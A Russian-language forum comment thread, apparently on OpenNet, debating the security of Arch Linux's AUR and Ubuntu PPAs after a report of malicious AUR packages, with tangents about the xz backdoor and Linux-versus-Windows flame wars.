А ведь в убунтовском launchpad ppa не меньше, или даже больше малвари от ноунэйм авторов. А в aur то не бинари, а pkgbuild, что как бы позволяет увидеть подмену.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 11:58 
> А в aur то не бинари

Говоришь так, будто бы их там нет...

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 14:52 
Для тугодумов разжую. PKGBUILD это простой bash скрипт, даже если пакет собирается из бинарников, в этом скрипте находятся ссылки на источники с которых эти бинарники качаются. Никто не мешает заглянуть в PKGBUILD (хоть через вебморду) и убедится что файлы качаются с официального сайта/репозитория.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 21:05 
убедится что файлы качаются с официального скомпрометированного гитхаба.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 09:37 
Достаточно не ставить свежие пакеты из аур.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено 12yoexpert , 02-Авг-25 10:26 
это арч, там в принципе нет несвежих пакетов
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено кантикариус , 02-Авг-25 21:07 
И начать ставить несвежие. Из AUR :D
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 22:52 
Лол, что, это реальная защита такая?

Линус фанаты продолжают нести и не расплескивать.

Никто ни за что не отвечает, тысячи пакетов, непонятные мейнтейнеры, про которых известен только их выдуманный email, никакой репутации или юридической ответственности - БЕЗОПАСНОСТЬ.

Про xz, который был затроянен месяцами и попал в несколько листов, забыли.

ЛОЛ.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 08:32 
Опеннет-истерички продолжают нагнетать.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 08:43 
Нагнетать? В "безопасной" системе довольно долгое время жил бэкдор, который "тысячи глаз" заметили далеко не сразу.
И ещё у вас, представителей 4%-сообщества есть привычка съезжать с темы при любом негативном упоминании, что ваша "безопасная" система является именно такой, безопасной в кавычках..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 09:47 
А кто пострадал от этого бэкдора?
Сейчас у меня арч и я даже не знаю как поймать вирус. Из аура ставлю пару пакетов, у которых нормальный рейтинг от сообщества, в PKGBUILD не заглядывал. Даже подключил репо chaotic-aur, ставил игрушки оттуда.

А когда пользовался виндой, много раз ловил вирусов-вымогателей, которые мне всё шифровали, благо у меня всегда были копии всех данных. Несколько раз помогал знакомым в подобных случаях. Хотя от винды отказался не по этой причине.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 15:49 
Объясни - какая взаимосвязь между трояном в xz и виндой? Это какой-то сюр! Зачем приплетать сюда другую систему? Давай напишем, что "в маке этот троян запустить не удастся" и будем всех пересаживать на мак?
4%-ное сообщество все не может избавиться от мифа (который само же и придумало), что якобы линукс безопасней всех. Но когда начинаешь им говорить, что опыт Android говорит об обратном, они начинают выдумывать, что" каждый вендор сам модифицирует ядро для определённого устройства" и то, что в своей основе все исходные функции работают как и задумано в Google, они упрямо игнорируют. Но зато когда надо превознести процент использования линукса, "вспоминают" об умных утюгах и фенах..
Двуличие и двойные стандарты - кредо 4%-ного сообщества, которое вопит, что винда плохая, но игры и софт, запускаемые ими под Wine - "это другое"..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 11:57 
Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!
А пользователь хочет именно пользоваться ОС, то есть устанавливать ПО в пару кликов через GUI.
Вот здесь у тех, у кого красные глаза и бубен в руках решают монетанизировать свой мазахизм чёрными методами!
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 12:17 
Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт? Или искать в интернетах удобнее?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 19:55 
виндузятнику же удобнее "бесплатно и без смс" - он по другому и не умеет...
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 07:17 
Гениально! Проблема в очередной раз в лине, но 4%-ное сообщество при любом удобном случае поливает грязью другую систему..
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 19:34 
так-то обсуждается конкретный пакетный менеджер. которые разные в разных дистрибах. и при чём тут линь?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Anonimm , 03-Авг-25 21:19 
А винда тут с какой стороны?
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 21:52 
Вы это написали к чему? Намекаете что и так всё в порядке? Про процент дисктопа уже было написано.

> "Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт?"

У людей ОС установлена не для развлечений, у них вообще-то платёжный терминал для торговли на бирже установлен. А вы предлагаете довериться какому-то непонятному Васи.
Сторонники теории 1000 глаз? Только она не даёт гарантии. Сколько было случаев, когда пакет выкупали и внедряли блэкдор.

> "Или искать в интернетах удобнее?"

Безопаснее ставить ПО напрямую от создателя. Под "в пару кликов через GUI." имеется виду, что для этого консоль открывать не нужно.


Снизу коммент, тоже относится и к ppa. Это вам не AppStore, где есть пре-модерация.
> "От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор."

Казалось бы, причём здесь LTS, только там софт (вмести с багами, которые знают абсолютно все) устаревший - старше чем помёт мамонта. Valve из-за этого фактора на Arch перешла.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Котофалк , 04-Авг-25 12:36 
> Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!

Проприетарный - не будет. Опенсорсному это и не надо, сборкой ПО под конкретный дистр занимаются мейнтейнеры оного дистра.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 02-Авг-25 12:13 
От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Пояснительная бригада , 02-Авг-25 12:23 
Aур использую чтоб качать 1 пакет, zapret.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 03-Авг-25 18:53 
Ждем, когда решат проверить crates.io.
"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено нах. , 04-Авг-25 16:22 
А как ты там что-то проверишь, оно ж на хрусте. write-only да и то ИИ понаписал.

"В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."
Отправлено Аноним , 06-Авг-25 04:33 
Я конечно на арче не сидел. Но по моему мнению очевидно что арч самый популярный дистрибутив, особенно после стим дека. По моему в будущем таких случаев будет много, ведь аудитория дистрибутива огромная